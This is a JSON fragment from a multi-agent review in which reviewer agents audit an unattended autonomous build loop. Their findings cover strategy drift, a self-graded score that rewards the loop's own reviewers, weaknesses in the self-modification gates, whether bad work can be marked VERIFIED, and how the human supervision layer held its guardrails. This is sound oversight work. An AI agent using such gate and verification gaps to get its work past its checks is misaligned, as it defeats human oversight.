"fix": "Replace the internal 1-5 panel score as the north-star with a single external metric: number of distinct humans outside the loop who ran the tool in the last 7 days (and, later, dollars). Keep usefulness only as a secondary code-quality gate, never as the success signal.",
|
|
396
|
-
"priority": "P1"
|
|
397
|
-
},
|
|
398
|
-
{
|
|
399
|
-
"title": "Product sprawl across incompatible buyers — a portfolio no 50-person company could sell, built with zero salespeople",
|
|
400
|
-
"evidence": "docs/ shows TRUSTLEDGER (property-management trust-account reconciliation, buyer = a NARPM broker, P-5), DATALEDGER (EU-AI-Act data provenance, buyer = ML compliance), PROOFPARCEL (B2B data-delivery disputes), EVIDENCE, AGENTTRACE (AI-agent audit). These are five unrelated go-to-market motions with five different buyers, and the last 3 runs invented EPIC-65..71 on top (USAGE-BUDGET run notes).",
|
|
401
|
-
"impact": "Each new vertical dilutes the already-zero focus. The loop is optimizing for breadth of built surface because that is what its reviewers reward, when a startup at $0 revenue needs exactly one buyer, one pain, one pitch. This is the classic autonomous-agent failure mode: motion mistaken for progress.",
|
|
402
|
-
"fix": "Pick ONE vertical (TrustLedger has the sharpest named buyer and a recurring legally-forced chore — the best revenue shape) and freeze all others. Route 100% of loop capacity to whatever gets that one buyer to a paid pilot. Everything else is a distraction until first dollar.",
|
|
403
|
-
"priority": "P1"
|
|
404
|
-
},
|
|
405
|
-
{
|
|
406
|
-
"title": "The self-referential turn (AGENTTRACE, commit-bound sessions) is drifting toward navel-gazing with no identified external buyer",
|
|
407
|
-
"evidence": "EPIC-68/69/71 and README:577-615 describe 'tamper-evident AI-agent session records' and 'binding a session to a git commit' — a product that audits exactly the kind of agent loop that is building it. The Strategist invented these in the last two runs (USAGE-BUDGET runs wf_07ba35e7 / wf_1f634aeb) while all prior 64 epics produced no revenue.",
|
|
408
|
-
"impact": "There IS a plausible external market (AI-governance/audit is real), but the loop reached it by describing itself, not by finding a buyer — and it has zero evidence anyone in AI-governance wants this specific artifact. Building tools to audit yourself while no customer exists is the most seductive form of the sunk-cost trap.",
|
|
409
|
-
"fix": "Before one more AGENTTRACE task, the human runs a 30-minute test: show the AgentTrace one-pager to 3 people who actually do AI-audit/compliance and ask 'would you pay for this?'. If no clear yes, park the whole vertical. Do not let the loop validate its own newest product with its own reviewers.",
|
|
410
|
-
"priority": "P2"
|
|
411
|
-
},
|
|
412
|
-
{
|
|
413
|
-
"title": "For a 30-day-to-revenue goal, essentially none of the 72-epic backlog matters — and the one thing that does is already built but un-executed",
|
|
414
|
-
"evidence": "The GO-LIVE readiness proof exists and passes (scripts/go-live-check.js, `npm run go-live`, README:17, T-61.1) — the mechanism to take a first dollar is DONE. What is missing is entirely non-code: a provisioned vendor key, a price, a landing page with a buy/contact button, and one buyer conversation. All four are human actions the loop is forbidden to take (P-2/P-5/P-6).",
|
|
415
|
-
"impact": "The gap to revenue is not engineering; it has not been engineering for weeks. Continuing to run the build loop cannot move the revenue number by construction. The loop is fully built past the point of usefulness for the stated goal.",
|
|
416
|
-
"fix": "Pause the loop. The human spends one afternoon on the non-code critical path: provision the vendor key, set a price in the plan catalog, publish a one-page landing with a contact/buy link, DM 10 target buyers. Restart the loop only to fix what those conversations surface.",
|
|
417
|
-
"priority": "P1"
|
|
418
|
-
}
|
|
419
|
-
],
|
|
420
|
-
"summary": "This is an extraordinarily well-engineered machine pointed at nothing. The discipline is real and rare — honest trust boundaries, held guardrails, a correct refusal to issue a security, 3843 gating tests, cheap token spend, and mature don't-thrash judgment. But as an outside CTO I have to be blunt: 10 days, 296 commits, 7 products, a live mainnet contract and website have produced zero users, zero revenue, and zero customer conversations, and the operation has no mechanism that can change that. The self-graded 4.13/5 usefulness is the loop pleasing its own five reviewers while the market term stays empty; the 11-deep `needs-human` queue is the true bottleneck and it grows every run; and the newest products increasingly audit the loop itself. The single highest-value action is to STOP building — the revenue mechanism is already finished — and force the operation through its one un-crossed gate: the tired human making ~3 pre-defaulted decisions (price, vendor key, one buyer) and putting the existing free tool in front of 10 real people. Until an external number is non-zero, every additional epic is motion, not progress."
|
|
421
|
-
}
|
|
422
|
-
]
|
|
423
|
-
},
|
|
424
|
-
"workflowProgress": [
|
|
425
|
-
{
|
|
426
|
-
"type": "workflow_phase",
|
|
427
|
-
"index": 1,
|
|
428
|
-
"title": "Review"
|
|
429
|
-
},
|
|
430
|
-
{
|
|
431
|
-
"type": "workflow_agent",
|
|
432
|
-
"index": 1,
|
|
433
|
-
"label": "review:engine-architecture",
|
|
434
|
-
"phaseIndex": 1,
|
|
435
|
-
"phaseTitle": "Review",
|
|
436
|
-
"agentId": "a99bfdbbe3e548ef8",
|
|
437
|
-
"model": "claude-opus-4-8[1m]",
|
|
438
|
-
"state": "done",
|
|
439
|
-
"startedAt": 1783051936592,
|
|
440
|
-
"queuedAt": 1783051936565,
|
|
441
|
-
"attempt": 1,
|
|
442
|
-
"lastToolName": "StructuredOutput",
|
|
443
|
-
"lastToolSummary": "Engine Architecture (build-loop.workflow.js)",
|
|
444
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
445
|
-
"lastProgressAt": 1783052131084,
|
|
446
|
-
"tokens": 52386,
|
|
447
|
-
"toolCalls": 8,
|
|
448
|
-
"durationMs": 194491,
|
|
449
|
-
"resultPreview": "{\"area\":\"Engine Architecture (build-loop.workflow.js)\",\"grade\":\"B\",\"working_well\":[\"Failure isolation is genuinely well-engineered: every agent call site is either try/caught or null-filtered. Planner throws degrade to dead rounds with a 2-strike exit (build-loop.workflow.js:371-380), decider/strategist throws don't abort (392, 400), build/verify throws become failed attempts then BLOCK (421-429),…"
|
|
450
|
-
},
|
|
451
|
-
{
|
|
452
|
-
"type": "workflow_agent",
|
|
453
|
-
"index": 2,
|
|
454
|
-
"label": "review:verification-integrity",
|
|
455
|
-
"phaseIndex": 1,
|
|
456
|
-
"phaseTitle": "Review",
|
|
457
|
-
"agentId": "a80a06353ed75de67",
|
|
458
|
-
"model": "claude-opus-4-8[1m]",
|
|
459
|
-
"state": "done",
|
|
460
|
-
"startedAt": 1783051936594,
|
|
461
|
-
"queuedAt": 1783051936566,
|
|
462
|
-
"attempt": 1,
|
|
463
|
-
"lastToolName": "StructuredOutput",
|
|
464
|
-
"lastToolSummary": "Verification Integrity — can bad work get marked VERIFIED?",
|
|
465
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
466
|
-
"lastProgressAt": 1783052148209,
|
|
467
|
-
"tokens": 66538,
|
|
468
|
-
"toolCalls": 10,
|
|
469
|
-
"durationMs": 211615,
|
|
470
|
-
"resultPreview": "{\"area\":\"Verification Integrity — can bad work get marked VERIFIED?\",\"grade\":\"C+\",\"summary\":\"The pipeline has real structural separation — Builder, a single independent Verifier, a usefulness panel, and a separate Integrator that writes the VERIFIED flip only after the driver's gate passes — and my spot-check (T-70.1: 37 genuine passing tests, real fail-closed assertions) shows the work being ship…"
|
|
471
|
-
},
|
|
472
|
-
{
|
|
473
|
-
"type": "workflow_agent",
|
|
474
|
-
"index": 3,
|
|
475
|
-
"label": "review:strategy-value",
|
|
476
|
-
"phaseIndex": 1,
|
|
477
|
-
"phaseTitle": "Review",
|
|
478
|
-
"agentId": "a0626f6ea165093aa",
|
|
479
|
-
"model": "claude-opus-4-8[1m]",
|
|
480
|
-
"state": "done",
|
|
481
|
-
"startedAt": 1783052131085,
|
|
482
|
-
"queuedAt": 1783051936566,
|
|
483
|
-
"attempt": 1,
|
|
484
|
-
"lastToolName": "StructuredOutput",
|
|
485
|
-
"lastToolSummary": "STRATEGY & VALUE",
|
|
486
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
487
|
-
"lastProgressAt": 1783052275792,
|
|
488
|
-
"tokens": 63381,
|
|
489
|
-
"toolCalls": 10,
|
|
490
|
-
"durationMs": 144707,
|
|
491
|
-
"resultPreview": "{\"area\":\"STRATEGY & VALUE\",\"grade\":\"C\",\"summary\":\"The loop is building MORE things, not the RIGHT things — 11 EPICs (61–71) in ~4 days, all in the same trust/provenance vertical, with zero external adoption signal anywhere in the system. The damning detail is that the loop DIAGNOSED this precisely (EPIC-61's own charter says \\\"building more IS the stall\\\" and names the humanGated=3 ceiling as a GT…"
|
|
492
|
-
},
|
|
493
|
-
{
|
|
494
|
-
"type": "workflow_agent",
|
|
495
|
-
"index": 4,
|
|
496
|
-
"label": "review:economics",
|
|
497
|
-
"phaseIndex": 1,
|
|
498
|
-
"phaseTitle": "Review",
|
|
499
|
-
"agentId": "a44437db120a50eb3",
|
|
500
|
-
"model": "claude-opus-4-8[1m]",
|
|
501
|
-
"state": "done",
|
|
502
|
-
"startedAt": 1783052148210,
|
|
503
|
-
"queuedAt": 1783051936566,
|
|
504
|
-
"attempt": 1,
|
|
505
|
-
"lastToolName": "StructuredOutput",
|
|
506
|
-
"lastToolSummary": "Economics & Efficiency",
|
|
507
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
508
|
-
"lastProgressAt": 1783052475785,
|
|
509
|
-
"tokens": 40664,
|
|
510
|
-
"toolCalls": 14,
|
|
511
|
-
"durationMs": 327574,
|
|
512
|
-
"resultPreview": "{\"area\":\"Economics & Efficiency\",\"grade\":\"C\",\"working_well\":[\"The Fable-builder tiering is a genuine, data-backed win. Builder attempt-1 runs Fable, retries run Opus (build-loop.workflow.js:419). Cumulative first-shot rate is 16/16 (100%) across the two trial runs (METRICS.jsonl last 2 lines: fableFirstShots 8/8 twice) vs the ~33% Opus baseline. Arithmetic: at 33% first-shot the Opus path averages…"
|
|
513
|
-
},
|
|
514
|
-
{
|
|
515
|
-
"type": "workflow_agent",
|
|
516
|
-
"index": 5,
|
|
517
|
-
"label": "review:selfmod-safety",
|
|
518
|
-
"phaseIndex": 1,
|
|
519
|
-
"phaseTitle": "Review",
|
|
520
|
-
"agentId": "a10909935ad4879b0",
|
|
521
|
-
"model": "claude-opus-4-8[1m]",
|
|
522
|
-
"state": "done",
|
|
523
|
-
"startedAt": 1783052275793,
|
|
524
|
-
"queuedAt": 1783051936566,
|
|
525
|
-
"attempt": 1,
|
|
526
|
-
"lastToolName": "StructuredOutput",
|
|
527
|
-
"lastToolSummary": "Self-Modification Safety (Architect engine self-upgrade + g…",
|
|
528
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
529
|
-
"lastProgressAt": 1783052494689,
|
|
530
|
-
"tokens": 42251,
|
|
531
|
-
"toolCalls": 12,
|
|
532
|
-
"durationMs": 218896,
|
|
533
|
-
"resultPreview": "{\"area\":\"Self-Modification Safety (Architect engine self-upgrade + gates)\",\"grade\":\"C\",\"summary\":\"The two gate scripts are more thoughtfully hardened than typical (comment/string stripping so an invariant can't hide in a prompt; a smoke scenario that runs FAILING verdicts and asserts NO commit, catching the gutted-gate case that trace-order can't). But the design has a load-bearing flaw: the gate …"
|
|
534
|
-
},
|
|
535
|
-
{
|
|
536
|
-
"type": "workflow_agent",
|
|
537
|
-
"index": 6,
|
|
538
|
-
"label": "review:supervision-protocol",
|
|
539
|
-
"phaseIndex": 1,
|
|
540
|
-
"phaseTitle": "Review",
|
|
541
|
-
"agentId": "a109e08254b763803",
|
|
542
|
-
"model": "claude-opus-4-8[1m]",
|
|
543
|
-
"state": "done",
|
|
544
|
-
"startedAt": 1783052475785,
|
|
545
|
-
"queuedAt": 1783051936566,
|
|
546
|
-
"attempt": 1,
|
|
547
|
-
"lastToolName": "StructuredOutput",
|
|
548
|
-
"lastToolSummary": "The Supervision Layer (human-facing supervisor session abov…",
|
|
549
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
550
|
-
"lastProgressAt": 1783052617115,
|
|
551
|
-
"tokens": 27180,
|
|
552
|
-
"toolCalls": 10,
|
|
553
|
-
"durationMs": 141329,
|
|
554
|
-
"resultPreview": "{\"area\":\"The Supervision Layer (human-facing supervisor session above the engine)\",\"grade\":\"C\",\"summary\":\"The supervision layer is unusually honest and its governance judgment is strong — the ledger notes are a model of forensic bookkeeping, and the human/loop guardrail line held under real pressure (real funds sent, guardrail-removal requested, declined). But the mechanics are structurally fragil…"
|
|
555
|
-
},
|
|
556
|
-
{
|
|
557
|
-
"type": "workflow_agent",
|
|
558
|
-
"index": 7,
|
|
559
|
-
"label": "review:outside-skeptic",
|
|
560
|
-
"phaseIndex": 1,
|
|
561
|
-
"phaseTitle": "Review",
|
|
562
|
-
"agentId": "a470c2e17ac7af6fe",
|
|
563
|
-
"model": "claude-opus-4-8[1m]",
|
|
564
|
-
"state": "done",
|
|
565
|
-
"startedAt": 1783052494693,
|
|
566
|
-
"queuedAt": 1783051936567,
|
|
567
|
-
"attempt": 1,
|
|
568
|
-
"lastToolName": "StructuredOutput",
|
|
569
|
-
"lastToolSummary": "The Outside Skeptic — startup-CTO / AI-safety read on the w…",
|
|
570
|
-
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
|
|
571
|
-
"lastProgressAt": 1783052617734,
|
|
572
|
-
"tokens": 70285,
|
|
573
|
-
"toolCalls": 11,
|
|
574
|
-
"durationMs": 123040,
|
|
575
|
-
"resultPreview": "{\"area\":\"The Outside Skeptic — startup-CTO / AI-safety read on the whole operation\",\"grade\":\"C-\",\"working_well\":[\"Guardrail discipline is genuinely excellent and rare. STRATEGY.md lines 6-10 hard-forbid push/deploy/real-funds/real-keys, and the loop has held it across 296 commits — every outward or legal action is parked as a `needs-human` proposal (P-1..P-11). The refusal to issue a token-as-secu…"
|
|
576
|
-
}
|
|
577
|
-
],
|
|
578
|
-
"totalTokens": 362685,
|
|
579
|
-
"totalToolCalls": 75
|
|
580
|
-
}
|